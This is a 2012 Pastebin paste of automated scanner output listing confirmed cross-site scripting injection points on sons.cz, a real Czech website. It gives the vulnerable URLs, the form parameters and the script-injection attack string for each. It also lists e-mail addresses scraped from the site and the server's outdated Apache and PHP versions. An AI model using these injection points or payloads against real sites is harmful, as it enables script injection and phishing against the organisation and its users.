Advertisement
sroub3k

sons.cz

Feb 4th, 2012
201
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.83 KB | None | 0 0
  1. http://www.sons.cz/
  2.  
  3. XSS (Cross-site Scripting)
  4.  
  5. Severity : Important
  6. Confirmation : Confirmed
  7. Detection Accuracy :
  8. Vulnerable URL : http://www.sons.cz/akce/Nahled_akce.php?d_act_name='"--></style></script><script>alert(0x000D8F)</script>
  9. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  10. Parameter Name: d_act_name
  11. Parameter Type: Querystring
  12. Attack Pattern: '"--></style></script><script>alert(0x000D8F)</script>
  13.  
  14. Severity : Important
  15. Confirmation : Confirmed
  16. Detection Accuracy :
  17. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  18. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  19. Parameter Name: d_act_beg_day
  20. Parameter Type: Post
  21. Attack Pattern: '"--></style></script><script>alert(0x000D7F)</script>
  22.  
  23. Severity : Important
  24. Confirmation : Confirmed
  25. Detection Accuracy :
  26. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  27. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  28. Parameter Name: d_act_beg_hour
  29. Parameter Type: Post
  30. Attack Pattern: '"--></style></script><script>alert(0x000DCE)</script>
  31.  
  32. Severity : Important
  33. Confirmation : Confirmed
  34. Detection Accuracy :
  35. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  36. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  37. Parameter Name: d_act_beg_minute
  38. Parameter Type: Post
  39. Attack Pattern: '"--></style></script><script>alert(0x000DFA)</script>
  40.  
  41. Severity : Important
  42. Confirmation : Confirmed
  43. Detection Accuracy :
  44. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  45. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  46. Parameter Name: d_act_beg_month
  47. Parameter Type: Post
  48. Attack Pattern: '"--></style></script><script>alert(0x000E58)</script>
  49.  
  50. Severity : Important
  51. Confirmation : Confirmed
  52. Detection Accuracy :
  53. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  54. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  55. Parameter Name: d_act_beg_year
  56. Parameter Type: Post
  57. Attack Pattern: '"--></style></script><script>alert(0x000EC4)</script>
  58.  
  59. Severity : Important
  60. Confirmation : Confirmed
  61. Detection Accuracy :
  62. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  63. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  64. Parameter Name: d_act_description
  65. Parameter Type: Post
  66. Attack Pattern: '"--></style></script><script>alert(0x000F02)</script>
  67.  
  68. Severity : Important
  69. Confirmation : Confirmed
  70. Detection Accuracy :
  71. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  72. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  73. Parameter Name: d_act_email
  74. Parameter Type: Post
  75. Attack Pattern: '"--></style></script><script>alert(0x000F56)</script>
  76.  
  77. Severity : Important
  78. Confirmation : Confirmed
  79. Detection Accuracy :
  80. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  81. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  82. Parameter Name: d_act_end_day
  83. Parameter Type: Post
  84. Attack Pattern: '"--></style></script><script>alert(0x000FB3)</script>
  85.  
  86. Severity : Important
  87. Confirmation : Confirmed
  88. Detection Accuracy :
  89. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  90. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  91. Parameter Name: d_act_end_hour
  92. Parameter Type: Post
  93. Attack Pattern: '"--></style></script><script>alert(0x00100B)</script>
  94.  
  95. Severity : Important
  96. Confirmation : Confirmed
  97. Detection Accuracy :
  98. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  99. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  100. Parameter Name: d_act_end_minute
  101. Parameter Type: Post
  102. Attack Pattern: '"--></style></script><script>alert(0x00107A)</script>
  103.  
  104. Severity : Important
  105. Confirmation : Confirmed
  106. Detection Accuracy :
  107. Vulnerable URL : http://www.sons.cz/posp/prihlasit.php
  108. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  109. Parameter Name: adresa_zajemce
  110. Parameter Type: Post
  111. Attack Pattern: '"--></style></script><script>alert(0x0010BD)</script>
  112.  
  113. Severity : Important
  114. Confirmation : Confirmed
  115. Detection Accuracy :
  116. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  117. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  118. Parameter Name: d_act_end_month
  119. Parameter Type: Post
  120. Attack Pattern: '"--></style></script><script>alert(0x0010DB)</script>
  121.  
  122. Severity : Important
  123. Confirmation : Confirmed
  124. Detection Accuracy :
  125. Vulnerable URL : http://www.sons.cz/posp/prihlasit.php
  126. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  127. Parameter Name: adresa_zamestnavatel
  128. Parameter Type: Post
  129. Attack Pattern: '"--></style></script><script>alert(0x0010F5)</script>
  130.  
  131. Severity : Important
  132. Confirmation : Confirmed
  133. Detection Accuracy :
  134. Vulnerable URL : http://www.sons.cz/akce/Ob_formular_akce.php
  135. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  136. Parameter Name: d_act_end_year
  137. Parameter Type: Post
  138. Attack Pattern: '"--></style></script><script>alert(0x001100)</script>
  139.  
  140. Severity : Important
  141. Confirmation : Confirmed
  142. Detection Accuracy :
  143. Vulnerable URL : http://www.sons.cz/posp/prihlasit.php
  144. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  145. Parameter Name: dotaz
  146. Parameter Type: Post
  147. Attack Pattern: '"--></style></script><script>alert(0x001104)</script>
  148.  
  149. Severity : Important
  150. Confirmation : Confirmed
  151. Detection Accuracy :
  152. Vulnerable URL : http://www.sons.cz/akce/Formular_akce_op.php
  153. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  154. Parameter Name: d_act_description
  155. Parameter Type: Post
  156. Attack Pattern: '"--></style></script><script>alert(0x0015F2)</script>
  157.  
  158. ||| E-mail Address Disclosure
  159.  
  160. Severity : Information
  161. Confirmation : Confirmed
  162. Vulnerable URL : http://www.sons.cz/kontakty.php
  163. Found E-mails:
  164.  
  165. sons@sons.cz
  166. info@sons.cz
  167. prezident@sons.cz
  168. dudr@sons.cz
  169. sia@sons.cz
  170. pomucky@sons.cz
  171. digitech@sons.cz
  172. zora@sons.cz
  173. internationaldep@sons.cz
  174. volejnik@braillnet.cz
  175. info@vodicipsi.cz
  176. prodejna-ol@sons.cz
  177. prodejna-pha@sons.cz
  178. zdroje@sons.cz
  179. sons@braillnet.cz
  180. web@braillnet.cz
  181. pomucky@braillnet.cz
  182. info@braillnet.cz
  183. info@brno.braillnet.cz
  184.  
  185. ||| Apache Version Disclosure
  186.  
  187. Severity : Low
  188. Confirmation : Confirmed
  189. Vulnerable URL : http://www.sons.cz/
  190. Vulnerability Classifications: PCI 6.5.6 OWASP A6
  191. Extracted Version: Apache/1.3.36 (Unix)
  192.  
  193. ||| PHP Version Disclosure
  194.  
  195. Severity : Low
  196. Confirmation : Confirmed
  197. Vulnerable URL : http://www.sons.cz/
  198. Vulnerability Classifications: PCI 6.5.6 OWASP A6
  199. Extracted Version: PHP/4.4.4
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement